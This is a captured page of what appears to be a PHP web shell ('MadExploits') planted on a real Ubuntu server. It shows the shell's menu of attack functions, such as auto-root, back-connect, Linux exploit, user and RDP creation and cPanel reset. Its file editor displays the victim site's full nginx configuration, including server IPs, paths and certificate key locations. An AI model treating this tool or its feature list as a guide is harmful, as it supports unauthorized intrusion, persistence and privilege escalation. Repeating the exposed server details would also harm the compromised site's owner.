Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.111.33
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
nginx /
sites-available /
[ HOME SHELL ]
Name
Size
Permission
Action
arcus
2.36
KB
-rw-r--r--
default
3.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : default
# Default server configuration # server { if ($host = arcusdesignz.com) { return 301 https://$host$request_uri; } # managed by Certbot listen 80 default_server; listen [::]:80 default_server; server_name arcusdesignz.com www.arcusdesignz.com; return 301 https://arcusdesignz.com$request_uri; } server { listen 443 ssl http2 default_server; listen [::]:443 ssl http2 default_server; # include snippets/snakeoil.conf; root /var/www/arcusdesignz.com/arcus; # Add index.php to the list if you are using PHP index index.php index.html index.htm; server_name arcusdesignz.com; # pass PHP scripts to FastCGI server # location ~ \.php$ { include snippets/fastcgi-php.conf; # # # With php-fpm (or other unix sockets): fastcgi_pass unix:/run/php/php7.3-fpm.sock; # # With php-cgi (or other tcp sockets): # fastcgi_pass 127.0.0.1:9000; } # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} location = /favicon.ico { log_not_found off; access_log off; } location = /robots.txt { allow all; log_not_found off; access_log off; } if ($request_uri ~* "^(.*/)index\.php$") { return 301 $1; } location / { try_files $uri $uri/ /index.php?$query_string; # Remove from everywhere index.php if ($request_uri ~* "^(.*/)index\.php(/?)(.*)") { return 301 $1$3; } } # Remove trailing slash. if (!-d $request_filename) { rewrite ^/(.+)/$ /$1 permanent; } # Clean Double Slashes if ($request_uri ~* "\/\/") { rewrite ^/(.*) /$1 permanent; } #location ~* \.(js|css|png|jpg|jpeg|gif|ico)$ { # expires max; # log_not_found off; #} location ~* \.(js|css|webp|avif|jpg|jpeg|png|gif|js|css|ico|swf|otf|woff2|ttf)$ { expires 1y; etag off; if_modified_since off; add_header Cache-Control "public, no-transform"; } gzip on; gzip_disable "msie6"; gzip_vary on; gzip_proxied any; gzip_comp_level 6; gzip_buffers 16 8k; gzip_http_version 1.1; gzip_min_length 256; gzip_types application/atom+xml application/geo+json application/javascript application/x-javascript application/json application/ld+json application/manifest+json application/rdf+xml application/rss+xml application/xhtml+xml application/xml font/eot font/otf font/ttf image/svg+xml text/css text/javascript text/plain text/xml; gzip_disable "MSIE [1-6]\."; #include snippets/certbot.conf; ssl_certificate /etc/letsencrypt/live/arcusdesignz.com-0001/fullchain.pem; # managed by Certbot ssl_certificate_key /etc/letsencrypt/live/arcusdesignz.com-0001/privkey.pem; # managed by Certbot } server { # Redirect www.example.com to example.com listen 443 ssl; # This needs to be the cert for www.example.com or *.example.com ssl_certificate /etc/letsencrypt/live/arcusdesignz.com/fullchain.pem; # managed by Certbot ssl_certificate_key /etc/letsencrypt/live/arcusdesignz.com/privkey.pem; # managed by Certbot include /etc/letsencrypt/options-ssl-nginx.conf; ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # Remember, if nginx doesnt find the server_name, it uses the first vhost. server_name www.arcusdesignz.com; return 301 https://arcusdesignz.com$request_uri; } # Virtual Host configuration for example.com # # You can move that to a different file under sites-available/ and symlink that # to sites-enabled/ to enable it. #
Close